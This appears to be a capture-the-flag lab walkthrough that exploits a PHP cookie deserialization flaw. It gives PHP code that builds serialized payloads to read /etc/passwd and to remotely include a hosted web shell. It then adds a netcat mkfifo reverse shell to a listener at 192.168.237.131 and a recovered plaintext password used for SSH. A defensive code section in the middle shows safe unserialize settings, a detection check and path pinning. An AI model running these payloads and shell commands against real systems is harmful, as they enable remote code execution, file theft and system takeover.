IP address scan
Port scan
Directory scan
Capture the traffic and inspect the cookie
Write the PHP code that builds the serialized object
<?php
// Mirror of the target's classes: Log carries a file path in $type_log,
// here pointed at /etc/passwd so the include/read sink exposes that file.
class Log {
private $type_log = "/etc/passwd";
}
// User holds a Log instance in $wel, so serializing a User also serializes the Log.
class User {
private $name = "admin";
private $wel;
function __construct() {
$this->wel = new Log();
}
}
$obj = new User();
// Private properties serialize with NUL bytes in their names, so base64 keeps
// the payload intact when it is placed in a cookie.
echo base64_encode(serialize($obj));
Visit the page
Set the cookie to the encoded value
Write 2.txt
<?php system($_GET['cmd']);?>
Include 2.txt remotely by pointing $type_log at it
<?php
// Same classes as before; $type_log now points at the hosted 2.txt so the
// include sink fetches and executes it (remote file inclusion).
class Log {
private $type_log = "http://192.168.110.118/2.txt";
}
class User {
private $name = "admin";
private $wel;
function __construct() {
$this->wel = new Log();
}
}
$obj = new User();
// Base64 again protects the NUL bytes from private property names.
echo base64_encode(serialize($obj));
Visit again
Set the cookie to the newly generated encoded value
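Both payloads above work only because the application feeds an attacker-controlled cookie straight into unserialize() and then uses the resulting Log object's $type_log as a file path. The following is an added defensive example, not code from the walkthrough or from the target application (whose server-side code is not shown); the Log/User property names are taken from the payloads above, the function names, the log directory and the sample cookies are assumptions constructed for the demonstration. It shows the three controls that break this chain: unserialize() with allowed_classes set to false, a detection check for serialized-object cookies, and a path pin that rejects stream wrappers and traversal.

```php
<?php
// Added defensive example (not the walkthrough's code). The server-side class
// that consumes the cookie is not on the page; a Log object whose $type_log
// property is used as a file path is assumed from the payloads above.

// Safe loader: decode the cookie but never let it instantiate classes.
function load_session_cookie(string $cookie): ?array {
    $raw = base64_decode($cookie, true);
    if ($raw === false) {
        return null;                       // not valid base64 at all
    }
    // allowed_classes => false turns every O:...{ token into
    // __PHP_Incomplete_Class, so no __wakeup/__destruct/__toString of an
    // attacker-chosen class ever runs.
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data)) {
        return null;                       // top-level object, scalar or garbage: reject
    }
    $clean = true;
    array_walk_recursive($data, function ($v) use (&$clean) {
        if (is_object($v)) {
            $clean = false;                // object smuggled inside a nested array
        }
    });
    return $clean ? $data : null;
}

// Detection helper for logging/WAF rules: a base64 cookie that decodes to a
// PHP serialized object literal ("O:" + class-name length) is a strong signal.
function cookie_looks_like_serialized_object(string $cookie): bool {
    $raw = base64_decode($cookie, true);
    return $raw !== false && preg_match('/^O:\d+:"/', $raw) === 1;
}

// If a log path genuinely must be stored, pin it under one directory and
// refuse stream wrappers: realpath() returns false for http:// and for
// missing files, and the prefix check blocks ../ and absolute paths.
function pin_log_path(string $candidate, string $base_dir): ?string {
    $base = realpath($base_dir);
    $real = realpath($candidate);
    if ($base === false || $real === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// --- demonstration with constructed inputs ---

// Same shape as the page's payload (property names taken from the page).
class Log  { private $type_log = "/etc/passwd"; }
class User {
    private $name = "admin";
    private $wel;
    function __construct() { $this->wel = new Log(); }
}

$attack_cookie = base64_encode(serialize(new User()));     // constructed
$benign_cookie = base64_encode(serialize(['name' => 'admin'])); // constructed

var_dump(cookie_looks_like_serialized_object($attack_cookie));
var_dump(load_session_cookie($attack_cookie));   // rejected: object, not array
var_dump(load_session_cookie($benign_cookie));   // accepted: plain array
var_dump(pin_log_path("/etc/passwd", "/var/log"));
var_dump(pin_log_path("http://192.168.110.118/2.txt", "/var/log"));
```

The first two controls are the ones that matter: once attacker cookies can no longer create objects, neither the /etc/passwd read nor the remote include of 2.txt has a sink to reach, and the detection helper gives the SOC a log line every time such a cookie arrives. The path pin is defence in depth for any code that still stores a path in session state.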
cmd=id
Reverse shell
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh±i+2>%261|nc+192.168.237.131+4444+>/tmp/f
Start a listener on Kali
cd / to move to the root directory
Inspect credentials.txt.bak, which reveals the password
KywZmnPWW6tTbW5w
SSH connection
Connect over SSH from the host machine